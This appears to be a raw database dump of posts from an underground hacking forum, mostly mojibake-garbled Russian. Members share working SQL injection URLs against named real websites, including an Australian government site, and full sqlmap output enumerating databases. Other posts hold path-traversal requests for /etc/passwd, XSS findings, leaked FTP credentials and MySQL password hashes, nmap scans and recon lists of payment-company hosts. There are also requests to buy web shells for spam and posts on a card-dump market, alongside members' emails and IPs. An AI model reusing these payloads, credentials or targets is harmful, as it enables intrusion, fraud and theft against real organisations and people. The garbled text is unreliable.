ÿþûучøть?)[/QUOTE]\r\n\r\nÃÂõ ÑÂÑ‚ тøÿð ÿþ ÿрøóûðшõýøю þт ÿþûь÷þòðтõûѠe17', 1, 0, '212.42.124.237', 0, 1, 0, 0, 0), (1124, 1088, 0, 'Invite', 2, 'New invite', 1403798959, '[b]Name[/b]: ibizza77\r\n [b]Age[/b]: 27\r\n [b]ICQ[/b]: 686054586\r\n [b]e-mail[/b]: aptaxa@bk.ru\r\n [b]Info[/b]: advise the user to\r\njoin you\r\nhttp://forum.antichat.ru/member.php?userid=225099\r\n\r\nmember - e17.', 1, 0, '77.40.60.248', 0, 1, 0, 0, 0), (1125, 1088, 1124, 'Bo0om', 7, '', 1403830083, 'ÃÂøхõрð ýõ ÿþýÑÂû, e17, ты øýòðùт хþчõшь ÿþûучøть?)', 1, 0, '90.189.2.190', 0, 1, 0, 0, 0), (1132, 1083, 1131, 'w0rm', 1, '', 1403880813, 'Òрþôõ ýø чõóþ ÑÂûþöýþóþ\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)+and+(1=2[/url]\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)+and+(1=1[/url]\r\n\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)union+select(1[/url] +\r\n[url]http://www.employmentcrossing.com/lcceospeaks.php?id=2186)union+select(1,2[/url] -\r\ncтрðýýыõ ÑÂтрðýýþÑÂтø)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1134, 1089, 1128, 'w0rm', 1, '', 1403886884, '[url]http://www.alexa.com/topsites/countries/DK[/url]\n\n/fagbesk.sam.sdu.dk ýõт ю÷õрþò', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1135, 1083, 1132, 'kx00', 6, '', 1403897233, 'hxxp://www.employmentcrossing.com/lcceospeaks.php?id=2186)AND(if(ASCII(lower(mid(USER(),1,1)))>=1,1,2)=1 \r\n\r\nÜþöýþ уöõ ôðüÿøть чõрõ÷ ñûðùýô... Information_schema ÿрøÑÂутÑÂтòуõт.\r\n\r\nhxxp://www.employmentcrossing.com/lcceospeaks.php?id=2186)AND(if(ASCII(lower(mid((select+group_concat(schema_name)+from+information_schema.schemata),1,1)))>=1,1,2)=1\r\n\r\nÑÂþфтøýы ýõ ñõрут... ôð ø ÑÂúрøÿт тþöõ чõт... üþöõт ôõûþ ò úуúðх. х÷ úþрþч.\r\nöþÿð чуõт чтþ üþöýþ õщõ чõрõ÷ error-based òыòõÑÂтø. ÿþúð х÷ úðú... ôуüðю.. õÑÂûø úтþ úрутðýõт ôõûøтõÑÂÑŒ, ýõ рðôø ÿрþфøтð, чøÑÂтþ øýтõрõÑÂ.', 1, 0, '5.57.14.42', 0, 1, 0, 0, 0), (1137, 1083, 1135, 'kx00', 6, '', 1403900545, 'úþрþчõ ýðôþ úþÿðть ò ÑÂтþрþýу name_const(), extractvalue()', 1, 0, '5.57.14.42', 0, 1, 0, 0, 0), (1138, 1027, 1030, 'w0rm', 1, '', 1403924615, '[url]http://79.142.27.16/?module=news[/url]\n[QUOTE]\n - [url]http://79.142.27.16/p.php[/url] - phpinfo()\n - [url]http://79.142.27.16/mysql.php[/url] -errors\n\n[code]\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /var/www/mailadmin.mpk.ru/mysql.php on line 2\n\nWarning: mysql_connect(): Access denied for user \'mail_user\'@\'localhost\' (using password: YES) in /var/www/mailadmin.mpk.ru/mysql.php on line 2\n\nDeprecated: mysql_query(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /var/www/mailadmin.mpk.ru/mysql.php on line 3\nArray ( [0] => auto_increment_increment [1] => 1 ) Array ( [0] => auto_increment_offset [1] => 1 ) Array ( [0] => autocommit [1] => ON ) Array ( [0] => automatic_sp_privileges [1] => ON ) Array ( [0] => back_log [1] => 50 ) Array ( [0] => basedir [1] => /usr/ ) Array ( [0] => big_tables [1] => OFF ) Array ( [0] => binlog_cache_size [1] => 32768 ) Array ( [0] => binlog_direct_non_transactional_updates [1] => OFF ) Array ( [0] => binlog_format [1] => STATEMENT ) Array ( [0] => bulk_insert_buffer_size [1] => 8388608 ) Array ( [0] => character_set_client [1] => utf8 ) Array ( [0] => character_set_connection [1] => utf8 ) Array ( [0] => character_set_database [1] => utf8 ) Array ( [0] => character_set_filesystem [1] => binary ) Array ( [0] => character_set_results [1] => utf8 ) Array ( [0] => character_set_server [1] => utf8 ) Array ( [0] => character_set_system [1] => utf8 ) Array ( [0] => character_sets_dir [1] => /usr/share/mysql/charsets/ ) \nWarning: mysql_close() expects parameter 1 to be resource, boolean given in /var/www/mailadmin.mpk.ru/mysql.php on line 8\n[/code]\n - [url]http://79.142.27.16/?module=people&action=view[/url]\n - [url]http://79.142.27.16/?module=admin&action=view[/url]\n[/QUOTE]\n\n[url]https://79.142.27.35/index.htm[/url]\n\n[code]\n88-94 \n+ [url]https://79.142.27.135/[/url] \n+ [url]http://79.142.27.178/view/index.shtml[/url] \ns1044.qiwi.com\n[url]https://79.142.19.10/[/url]\n[url]http://79.142.26.43/[/url]\n[url]https://79.142.22.22/[/url]\n[url]https://lync.qiwi.ru/[/url]\n[url]https://79.142.18.23/[/url]\n[url]https://79.142.18.21/[/url]\n[/code]\nÿрþùтøÑÂÑŒ ÑÂúðýõрþü ôøр\n\n\n[url]http://79.142.26.42/[/url]\nmango.qiwi.com\n[url]https://send.qiwi.ru/auth[/url]\n[url]http://www.arena-group.ru/[/url]\n[url]https://79.142.27.179/cgi-bin/enter.cgi[/url] - video\n[url]https://79.142.25.200[/url] - ibank\n79.142.23.4:443 mail\n[url]https://79.142.22.2/+CSCOE+/logon.html?fcadbadd=1[/url] + vpn\n[url]http://79.142.22.19/[/url] sms\n79.142.20.82:2000 - cisco\n[url]https://79.142.17.37/[/url]\n[url]https://agent.qiwi.com/[/url]\n[url]https://79.142.17.70/[/url] WTF???!\n\n[url]https://79.142.17.130/[/url]\n\n[url]ftp://automat:CkyaHjozpZw@79.142.17.91:21/[/url]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1139, 1091, 0, 'Invite', 2, 'New invite', 1403988237, '[b]Name[/b]: n0b0dy\r\n [b]Age[/b]: 100\r\n [b]ICQ[/b]: 16232242\r\n [b]e-mail[/b]: inbulk@crawler.com\r\n [b]Info[/b]: .', 1, 0, '87.117.199.174', 0, 1, 0, 0, 0), (1140, 1063, 1082, 'Bo0om', 7, '', 1404006414, '[QUOTE=w0rm;1082]ты þшøñðÃȄÂÑÂ) \r\n\r\nÜøýутúð ðñрõòøðтур:\r\n\r\nlocal_file_include ýõ üþöõт ñыть remote_code_ÑÂúÑÂÑÂѠøñþ local<>рõüþут ýþ ýø úðú ýõ рðòýþ.\r\n \r\níтþ úðú ýð÷òðть уÑÂ÷òøüþÑÂть ò ôöуüûõ 0day, òрþôõ ø ÿрõòðô_ñðó_ø_0ôýõù úðú ýðшõû, ýþ 0day ÑÂтþ уÑÂ÷òøüþÑÂтø ò ÿþ урþòýѠÑÂôрð.[/QUOTE]\r\n\r\nlfi != rfi? Ãâ€Ã° ûðôýþ, ты üýõ þтúрыû ÃÂüõрøúу)\r\nï óþòþрю þ тþü, чтþ lfi - ÿþ ôõфþûту rce.\r\nÜþöýþ чøтðть ûþóø, üþöýþ ÷ðю÷ðть proc self envirion, øÑÂÿþûь÷þòðть òрðÿÿõры, ýðúþýõц.\r\n\r\nÒþт ýþрü ÑÂтðтьÑÂ\r\n[url]http://www.xakep.ru/post/49508/[/url]\r\n\r\nàøýúûуôøть xss øûø sqlinj ýõ ÿþûучøтÑÂÑÂ, include() ýõ ÿþýøüðõт url ÑÂхõü, øýðчõ ñыûþ ñы ÿрþщõ.\r\n\r\nÃËœ òðщõ allow_url_include уöõ òыúûючõýð ûõт 100 ýð÷ðô ÿþ ôõфþûту', 1, 0, '176.209.56.166', 0, 1, 0, 0, 0), (1141, 1092, 0, 'w0rm', 1, 'coru.in (coru.ws)', 1404040431, 'ÑÂúøýуû:[B]Bo0om[/B]\nÿðÑÂÑÂ:ëëëëë\n[URL=\"https://www.dropbox.com/s/f3x6dtt7j1kx5lt/Coru_in.rar\"]Download[/URL]', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1142, 1093, 0, 'Invite', 2, 'New invite', 1404050514, '[b]Name[/b]: pnig0s\r\n [b]Age[/b]: 23\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: pnigos@live.com\r\n [b]Info[/b]: Work @ Alibaba\r\nFocus on:\r\n1,Web Security(mainly on Browser Security,XML \r\nSecurity,WebService Security,Javascript&HTML5 Security)\r\n2,Android Security\r\n3,Security Products R&D\r\n\r\nAcknowledge:\r\nGoogle Hall of Fame&Rewards\r\nTwitter Hall of Fame\r\nYahoo Hall of Fame&Rewards\r\nEbay Hall of Fame\r\nEvernote Hall of Fame\r\nYandex Hall of Fame&Rewards\r\nFlowdock Hall of Fame&Rewards\r\nMailchimp Hall of Fame\r\nMoodle Hall of Fame.', 1, 0, '114.252.103.141', 0, 1, 0, 0, 0), (1143, 1093, 1142, 'w0rm', 1, '', 1404054080, 'ï ôуüðю ÿþùôõт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1144, 1093, 1143, 'kx00', 6, '', 1404058895, 'íтþ ñõûþшÃȄÂÿыù... úðú òðрøðýт ýõ ñуôõт ÑÂûøòðть øýфу? ôðöõ ÿрþ тþöõ ÑÂðüыù ebay...', 1, 0, '31.192.252.118', 0, 1, 0, 0, 0), (1145, 1093, 1144, 'w0rm', 1, '', 1404061009, 'ѠþтÿøÑÂðû õüу ò тòø, òòõôу ò úурѠôõûð - ÿþÑÂüþтрøü чтþ ÑÂúðöõт', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1146, 1089, 1134, 'Psych0tr1a', 11, '', 1404072587, '[url]http://www.jobs.sdu.dk/vis_stilling.php?id=7526&lang=eng/../../../../../../../../../../../etc/passwd[/url]\r\n\r\nх÷ ÿþчõüу ýõ рðñþтðõт =(', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0), (1159, 1089, 1146, 'Psych0tr1a', 11, '', 1404147831, '[URL]http://www.mobil-forum.dk[/URL]\nvBulletin v4.2.0\n\n×ðю÷ðû ÑÂúÑÂÿûþøт\náþ÷ôðû ю÷õрð Doodlez1337 Ѡÿðрþûõü Doodlez13\nßрðòð ðôüøýÑÂúøõ\n\nýõ üþóу ÷ðùтø ò\n[URL]http://www.mobil-forum.dk/admincp/index.php[/URL]\n\nðôüøý ÿøôрøûð ÿþÑÂтðòøû ÿðрþûь ýð ôøрõúтþрøю', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0), (1148, 1093, 1145, 'syslink', 13, '', 1404079432, 'I support, waiting for chat log :)', 1, 0, '81.17.28.58', 0, 1, 0, 0, 0), (1149, 1094, 0, 'null', 9, 'Bitrix', 1404104471, 'ÕÑÂть у úþóþ уÑÂ÷òøüþÑÂтø ôûѠBitrix?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1150, 1083, 1130, 'null', 9, '', 1404112671, '[QUOTE=Bo0om;1130][CODE]www.menshealth.com - ~ $2000\r\nwww.employmentcrossing.com < $1000\r\nwww.acaloriecounter.com < $1000[/CODE][/QUOTE]\r\n\r\nÃÂуöýð рðñþчðѠSql øûø ôðüÿ ñð÷ы?', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1151, 1083, 1150, 'null', 9, '', 1404112836, 'Òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð ãà ð!\r\nsqlmap -u \"https://www.employmentcrossing.com/lcactivation.php?activation=d1ddead0a20ed01bc4b916675ae2649c\" --dbs\r\n\r\n sqlmap/1.0-dev - automatic SQL injection and database takeover tool\r\n [url]http://sqlmap.org[/url]\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting at 07:16:21\r\n\r\n[07:16:21] [INFO] resuming back-end DBMS \'mysql\'\r\n[07:16:21] [INFO] testing connection to the target URL\r\nsqlmap identified the following injection points with a total of 0 HTTP(s) requests:\r\n---\r\nPlace: GET\r\nParameter: activation\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: activation=d1ddead0a20ed01bc4b916675ae2649c\' AND 2473=2473 AND \'hoIQ\'=\'hoIQ\r\n\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 78 columns\r\n Payload: activation=-7694\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7179787971,0x6a6d465a61694e4b5353,0x7169747771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n---\r\n[07:16:25] [INFO] the back-end DBMS is MySQL\r\nweb application technology: Apache\r\nback-end DBMS: MySQL 5\r\n[07:16:25] [INFO] fetching database names\r\n[07:16:28] [INFO] the SQL query used returns 4 entries\r\n[07:16:31] [INFO] retrieved: \"information_schema\"\r\n[07:16:34] [INFO] retrieved: \"ec_jp\"\r\n[07:16:37] [INFO] retrieved: \"sellingcrossing\"\r\n[07:16:40] [INFO] retrieved: \"sellingcrossing_external\"\r\navailable databases [4]:\r\n[*] ec_jp\r\n[*] information_schema\r\n[*] sellingcrossing\r\n[*] sellingcrossing_external', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1155, 1096, 0, 'Kingbeef', 3, 'ÃœÞ Ãšð÷ðхÑÂтðýð.', 1404145216, '[url]http://mod.gov.kz/phpmyadmin/[/url]\r\n\r\nmod_kz: *05DF0E762EB37A1DDC27CC0624DF38ABEE907A44\r\nqadmin: *95C1A41C12A20FC7574B636616B8E9137A00F6E5\r\nroot: *E904E1852A968422BBC6A4A5E995322FD25CBF99', 1, 0, '109.62.244.155', 0, 1, 0, 0, 0), (1161, 1089, 1159, 'w0rm', 1, '', 1404148464, 'Køýь ÑÂÿûþõýт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1162, 1093, 1148, 'w0rm', 1, '', 1404153881, 'syslink, try to speak with him plz', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1163, 1089, 1161, 'Psych0tr1a', 11, '', 1404154995, 'ýðÿøÑÂðý ýð php\n\nñõрõü custnumber ø÷ фðùûð\n\n[url]http://*forum[/url] path*/install/update.php\n\nø ôðûõõ ÿþôÑÂтðòÃȄÂõü òÑÂÑ‘ ò ÑÂÿûþõýт', 1, 0, '79.139.233.12', 0, 1, 1, 0, 0), (1164, 1015, 1019, 'Psych0tr1a', 11, '', 1404161068, '[QUOTE=w0rm;1019]- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih.ms\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- rdot\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/d6y388k6e9eum1h/%D0%9C%D0%B0%D0%BA.zip\"]download[/URL][/QUOTE]\r\n\r\nçþтþ ðÑÂõчúøýþóþ ôðüÿð тðú ø ýõ þñýðруöøû\r\núÑÂтðтø þýð уöõ рøÿ\r\n\r\n[url]http://asechka.ru/[/url]', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0), (1165, 1093, 1162, 'syslink', 13, '', 1404164681, 'email sent, waiting on response', 1, 0, '188.28.201.98', 0, 1, 0, 0, 0), (1166, 1097, 0, 'Psych0tr1a', 11, 'Vulnerabilities in Australian goverment Bureau of Meteorlogy', 1404204058, 'SQLi [PostgreSQL]\r\n[code]http://www.bom.gov.au/water/regulations/report.php?personid=999999.9%20union%20all%20select%20null,chr(126)||chr(39)||(select%20c.relname%20from%20waterregs_2012.pg_catalog.pg_class%20c%20LEFT%20JOIN%20waterregs_2012.pg_catalog.pg_namespace%20n%20ON%20n.oid%20=%20c.relnamespace%20where%20c.relkind%20IN%20(chr(114),Null)%20and%20n.nspname%20NOT%20IN%20(chr(112)||chr(103)||chr(95)||chr(99)||chr(97)||chr(116)||chr(97)||chr(108)||chr(111)||chr(103),%20chr(112)||chr(103)||chr(95)||chr(116)||chr(111)||chr(97)||chr(115)||chr(116))%20and%20waterregs_2012.pg_catalog.pg_table_is_visible(c.oid)%20limit%201%20offset%2011)||chr(39)||chr(126),null,null,null,null,null,null,null,null,null,null,null--[/code]\r\n\r\n\r\nFile path traversal\r\n[code]http://210.8.119.235/aviation/php/product.php?id=../../../etc/passwd[/code]', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0), (1168, 1064, 1114, 'w0rm', 1, '', 1404229089, '.dk ÿрøþÑÂтðýþòûõýýþ, уöõ òыÑÂûðýþ ÿþрÑÂôúð 50ú öôõü òыÿûðт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1587, 1438, 0, 'Invite', 2, '{$name}', 1407964994, '[SIZE=\'4\'][COLOR=\'Sienna\']testa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: testa@yopmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.13.141.191\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://testa.ac.uk | testa.ac.uk \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1170, 1099, 0, 'w0rm', 1, 'SSL - https://w0rm.pw', 1404233847, 'ÿþÑÂтðòøû ÑÂõртõфøúðт - тõÿõрь ýðѠýõ ÿþôÑÂûушðют)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1171, 1100, 0, 'Psych0tr1a', 11, 'ãÑÂ÷òøüþÑÂтø ò osCShop Webshop þт osCommerce', 1404235052, '[B]Vulnerability type:[/B] [Mysql error based injection]\n[B]Google dork:[/B]\n[code]https://www.google.ru/#newwindow=1&q=filetype:php inurl:\"infopages.php\" inurl:\"info_id=\"[/code]\n\n[B]Example:[/B]\n[code]http://www.dyrenesno1.dk/infopages.php?info_id=-4\'or(extractvalue(1,concat(0x3a,user())))=\'[/code]\n\nÚðúøõ úþýúрõтýþ òõрÑÂøø уÑÂ÷òøüы ÿþúð ýõø÷òõÑÂтýþ.', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0), (1173, 1101, 0, 'w0rm', 1, 'https://w0rm.in - тõÑÂтøрþòðýøõ', 1404240222, 'тõÑÂтøруõü ýð ÿрþýøúýþòõýøõ þÑÂýþòýþù ÑÂúрøÿт ýðшõóþ ÿрþõúтð, ýðхþôúø þтÿøÑÂыòðõü ò ÑÂтþù тõüõ.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1179, 1101, 1178, 'null', 9, '', 1404298577, 'Ã’ ÿрþфøûõ ðúтøòýðѠxss\nÒþ òÑÂõх ÿþÃȄÂÑ… üþöýþ òÑÂтðòøть\nclick me!\n[QUOTE][url]https://w0rm.in/manageuser.php?action=profile&id=3[/url]\n\n[/QUOTE]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1177, 1101, 1173, 'Psych0tr1a', 11, '', 1404293775, 'ÃÂúтøòýðѠxss ÿрø ÑÂþ÷ôðýøø ÑÂþþñщõýøѠ\r\n\r\nURL Ñ xss :\r\n[code]https://w0rm.in/managemessage.php?action=showproject&id=6[/code]\r\n\r\nãÑÂ÷òøüыõ ÿþûѠ:\r\n[code]Title:\r\nText:[/code]\r\n\r\n\r\nтõúÑÂÑ‚ ÑÂþþñщõýøÑÂ:\r\n[code][/code]', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0), (1178, 1101, 1177, 'Psych0tr1a', 11, '', 1404297135, 'ßðÑÂÑÂøòýðѠxss ÿрø чðттøýóõ\n\n[code]https://w0rm.in/managechat.php?userto=root&uid=1[/code]', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0), (1180, 1101, 1179, 'null', 9, '', 1404299732, 'ßрø рõôðúтøрþòðýøø ÿрþфøûѠуúð÷ыòðõü ò User payload ø ýð òÑÂõü ÑÂðùтõ у ýðѠðúтøòýðѠxss ò ýøúõ', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0), (1181, 1101, 1180, 'w0rm', 1, '', 1404315258, 'ÿрõôûþöõýøѠÿþ фøúÑÂу Ѡÿрøüõрðüø...', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1182, 1101, 1181, 'Psych0tr1a', 11, '', 1404316312, '[QUOTE=w0rm;1181]ÿрõôûþöõýøѠÿþ фøúÑÂу Ѡÿрøüõрðüø...[/QUOTE]\r\n\r\n\r\nòþт тут õÑÂть þñ ÑÂтþü \r\n\r\n[url]http://wp-kama.ru/id_24/menyaem-simvolyi-html-na-spetssimvolyi-pri-kommentirovanii.html[/url]\r\n\r\nâþûьúþ ýðôþ õщё üõýÑÂть \" ýð " òрþôõñы \r\nòþ÷üþöýþ þшøñðюÑÂÑŒ', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0), (1183, 1101, 1182, 'kx00', 6, '', 1404320932, '[QUOTE=Psych0tr1a;1182]\r\nâþûьúþ ýðôþ õщё üõýÑÂть \" ýð " òрþôõñы \r\nòþ÷üþöýþ þшøñðюÑÂÑŒ[/QUOTE]\r\n\r\nты ÑÂþòõршõýýþ ÿрðò.', 1, 0, '77.95.63.68', 0, 1, 0, 0, 0), (1194, 1111, 0, 'Invite', 2, 'new invite', 1404450631, '[b]Name[/b]: 500mhz\r\n [b]Age[/b]: 120\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: c500mhz@gmail.com\r\n [b]Info[/b]: .', 1, 0, '94.153.230.50', 0, 1, 0, 0, 0), (1193, 1110, 0, 'Invite', 2, 'new invite', 1404426305, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1196, 1113, 0, 'Kingbeef', 3, 'china.cn', 1404458824, 'äøûьтруõтÑÂÑ \"_\" \"/\"\r\n[url]http://www.china.cn/tiaomashebei/2792561523.html\'or(ExtractValue(1,concat(0x3a,(select(version())))))=\'1[/url]\r\nÜþöõт úтþ ÑÂñрутøт тðñûøцы ø úþûþýúø?\r\n\r\n[IMG]http://data3.floomby.com/files/previews/4_7_2014/9/oeBowYndFE2chjpsGBhNDQ.jpg[/IMG]', 1, 0, '109.62.134.58', 0, 1, 0, 0, 0), (1197, 1114, 0, 'Invite', 2, 'new invite', 1404461560, '[b]Name[/b]: Your namewestside\r\n [b]Age[/b]: 41\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: walqry@mail.ru\r\n [b]Info[/b]: .', 1, 0, '193.169.36.21', 0, 1, 0, 0, 0), (1198, 1115, 0, 'Invite', 2, 'new invite', 1404461645, '[b]Name[/b]: Ivan\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: ivan@jabbos.org\r\n [b]Info[/b]: .', 1, 0, '95.31.7.31', 0, 1, 0, 0, 0), (1199, 1116, 0, 'Invite', 2, 'new invite', 1404467368, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '128.69.199.94', 0, 1, 0, 0, 0), (1205, 1113, 1196, 'w0rm', 1, '', 1404504468, 'fixed ÿþüþõüу', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (1212, 1128, 0, 'Invite', 2, '{$name}', 1404508694, '[b]Name[/b]: l;l;\'\r\n [b]Age[/b]: \r\n [b]ICQ[/b]: l;l\';\r\n [b]e-mail[/b]: ll\';l\';\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. You can also leave a jabber and other alternative addresses to communicate, in a word, everything that you think it necessary to bring to our attention. The minimum length of 200 characters, the maximum 4000.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0), (3048, 2508, 0, 'hunter_exploitkit', 172, 'Need to buy traffic or web shell', 1464450174, 'Hello\r\nI\', So Sorry for make this Thread\r\n\r\nI need to buy traffic or web shell(use for spam)\r\nI not have problem to payment and money value\r\n\r\nif anyone Have this service Please contact me\r\n\r\n[email]Exploitkit@jabb3r.org[/email]\r\n\r\n\r\n\r\nKing Regard\r\nHunter Ekit', 1, 0, '2.187.44.21', 0, 1, 0, 0, 0), (3049, 2508, 3048, 'ke7hb', 387, '', 1464451741, 'hi, I have contact for traffic \r\n\r\n[email]data2z@swissjabber.org[/email] is my temp jid.', 1, 0, '85.25.103.69', 0, 0, 0, 0, 0), (3050, 2509, 0, 'ke7hb', 387, 'D+P seller = banned!', 1464452024, 'Dump + PIN discussions are disallowed & banned from w0rm.WS market.\r\n\r\nWhy sell money for less money? BULLSHIT.', 1, 0, '85.25.103.69', 0, 1, 0, 0, 0), (1215, 1113, 1205, 'Kingbeef', 3, '', 1404534417, '[QUOTE=w0rm;1205]fixed ÿþüþõüу[/QUOTE]\r\n\r\nNo.\r\n[IMG]http://data3.floomby.com/files/previews/5_7_2014/6/4KFee0v6N06AIjnjHsQeQQ.jpg[/IMG]', 1, 0, '109.62.200.29', 0, 1, 0, 0, 0), (1615, 1450, 0, 'Invite', 2, '{$name}', 1408180050, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@1111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1219, 1015, 1164, 'w0rm', 1, '', 1404664875, 'Starting Nmap 6.46 ( [URL]http://nmap.org[/URL] ) at 2014-07-06 20:37 MSK\nNmap scan report for asechka.ru (5.187.2.104)\nHost is up (0.083s latency).\nrDNS record for 5.187.2.104: hivede17-2487.fornex.org\nNot shown: 985 closed ports\n[QUOTE]PORT STATE SERVICE\n21/tcp open ftp\n22/tcp open ssh\n25/tcp open smtp\n53/tcp open domain\n80/tcp open http\n110/tcp open pop3\n139/tcp open netbios-ssn\n143/tcp open imap\n443/tcp open https\n445/tcp open microsoft-ds\n993/tcp open imaps\n995/tcp open pop3s\n2525/tcp open ms-v-worlds\n3306/tcp open mysql\n8080/tcp open http-proxy[/QUOTE][URL]https://5.187.2.104/[/URL]\n\nþýø òøôøüþ ÿõрõýðÿрðòøûø ýð ôруóþù øÿ', 1, 0, '95.71.202.14', 0, 1, 0, 0, 0), (1220, 